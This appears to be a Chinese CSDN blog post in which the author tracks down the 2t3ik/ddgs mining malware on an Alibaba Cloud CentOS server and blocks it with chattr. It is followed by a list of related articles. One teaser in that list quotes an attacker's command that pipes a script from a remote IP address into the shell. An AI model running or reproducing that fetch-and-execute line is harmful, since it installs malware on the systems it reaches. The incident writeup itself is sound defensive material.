阿里云centos上处理2t3ik与ddgs病毒

原创 2018年04月16日 14:03:52

有段时间没有登陆阿里云了,前两天收到阿里云的短信,意思是:检测到我的linux服务器出现异常文件下载,请登陆控制台查看,我登陆控制台看到如下图显示


系统centos

由于我是新手,点了半天也没有免费的修复的按钮,而且升级企业版才可以查看,穷屌丝一个,升级企业版是不可能得到……

于是我就没有管它。

今天有时间登陆阿里云服务器看看什么情况,使用xshell连接,输入命令时候一卡一卡的,我还以为是xshell的问题呢,于是我还了putty登陆,还是一样,输入一个字母都卡半天,这就表明不是xshell的问题了,耐着性子输入top命令以查看,有个2t3ik.p的进程占用着99%多的CPU使用率,我赶紧把这个进程杀了,嗯,这下用着不卡了。


可是还没有等到半分钟,又开始一卡一卡的,继续使用top命令一看,还是这个2t3ik.p,只不过换了个PID


我也不知道这个进程是干什么的,可是不管这个是什么作用的进程让我的服务器卡顿我都要杀掉,于是我就百度搜索了这个进程,遗憾的是在百度上2t3ik.p这个关键字搜不到什么相关的信息


百度不行那我上阿里云官网看看有什么解决的办法,很遗憾,找不到,那我就谷歌吧,说起来还是谷歌好,虽然相关结果不多,也是让我找到线索处理这个2t3ik.p进程了,这个进程文件在/tmp目录下


于是把这个2t3ik.p文件删除,可是没过过一分钟又出现了这个文件,阿里云的管理台上提示出现异常文件文件下载


然后我吧这个文件删除掉,在新建一个2t3ik.p文件,不给权限,2t3ik.p进程是没有了,却又出现2t3ik.m这个进程


在/tmp文件夹下有2t3ik.m这个文件


想到过给/tmp文件夹添加不可修改的权限,觉得不大现实,因为以后这个文件夹会用到

那么把所有让所有以2t3ik开头的文件不给修改权限

使用命令

chattr +i 2t3ik*

chattr +i ddgs*

搞定,再也没有2t3ik的进程了


再也没有恼人的2t3ik病毒了

PS:阿里云的aliyundun真的不管用,对这个进程竟然防不了

PPS:阿里云对异常处理竟然还要升级企业版才能查看与一键处理,我一介屌丝哪来这个闲钱去升级啊

阿里云centos上处理2t3ik与ddgs病毒

有段时间没有登陆阿里云了,前两天收到阿里云的短信,意思是:检测到我的linux服务器出现异常文件下载,请登陆控制台查看,我登陆控制台看到如下图显示系统centos由于我是新手,点了半天也没有免费的修复...
  • be_x_man
  • be_x_man
  • 2018-04-16 14:03:52
  • 89

XMAN选拔赛官方Writeup

XMan选拔赛官方Writeup XMan 2017 Baaa [原理] 栈溢出。 [目的] 盲打栈溢出。 [环境] Ubuntu。 [工具] gdb、objdump、python。...
  • zsj2102
  • zsj2102
  • 2017-07-20 16:22:00
  • 1820

记一次阿里云黑客攻击事件

这几天服务器一直发生异常行为,阿里云报警如下:根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程...
  • u012259256
  • u012259256
  • 2018-04-07 12:36:23
  • 807

阿里云服务器被挖矿程序minerd入侵的终极解决办法

突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net...
  • tjcyjd
  • tjcyjd
  • 2017-01-06 17:35:50
  • 27596

pl/sql编程(二)

第一点要理解以下四点: DDL:数据库模式定义语言,关键字:create DML:数据操纵语言,关键字:Insert、delete、update DCL:数据库控制语言 ,关键字:grant、rem...
  • luman1991
  • luman1991
  • 2016-08-24 21:57:24
  • 6644

squid服务的应用[转]

原贴:http://blog.ixpub.net/8400463/viewspace-3985空间管理 您的位置: IXPUB技术博客 » 太陽微繫統sBlog » 博客 網絡依然還是計算機,Sun還...
  • chinalinuxzend
  • chinalinuxzend
  • 2007-09-23 14:02:00
  • 5053

阿里云CentOS7.2清除wnTKYg木马

最近发现阿里云CPU占用很高,一直是100%,重启之后降下来了,但过一会又100%。 用top命令查了一下,发现是wnTKYG进程占用了99.9%,百度了一下wnTKYG说是一个挖矿木马,中毒原因...
  • Jay_1989
  • Jay_1989
  • 2017-11-07 15:12:55
  • 778

服务器病毒问题解决- 阿里云 挖矿病毒,Circle_MI.png

http://blog.51cto.com/chaojiit/1924111 今天我们的服务器 CPU 跑满了,最后发现是中了两个病毒,病毒有时是恶意毁坏你的数据,有的为了当做肉机,...
  • silyvin
  • silyvin
  • 2017-11-24 11:31:13
  • 289

cuda,常量内存使用2

#include #include "cuda_runtime.h" #include "device_launch_parameters.h" #include #include "assert...
  • qq_16699519
  • qq_16699519
  • 2016-03-24 16:53:35
  • 591

堆与栈

堆区:村线程操纵的数据(对象形式存放)1 存储的全部是对象,每个对象包含一个与之对应的class信息--class的目的是得到操作指令2 jvm只有一个堆区(heap)被所有线程共享,堆区中不存放基本...
  • hongjingtianw
  • hongjingtianw
  • 2015-03-16 11:46:46
  • 19190
收藏助手
不良信息举报
您举报文章:阿里云centos上处理2t3ik与ddgs病毒
举报原因:
原因补充:

(最多只允许输入30个字)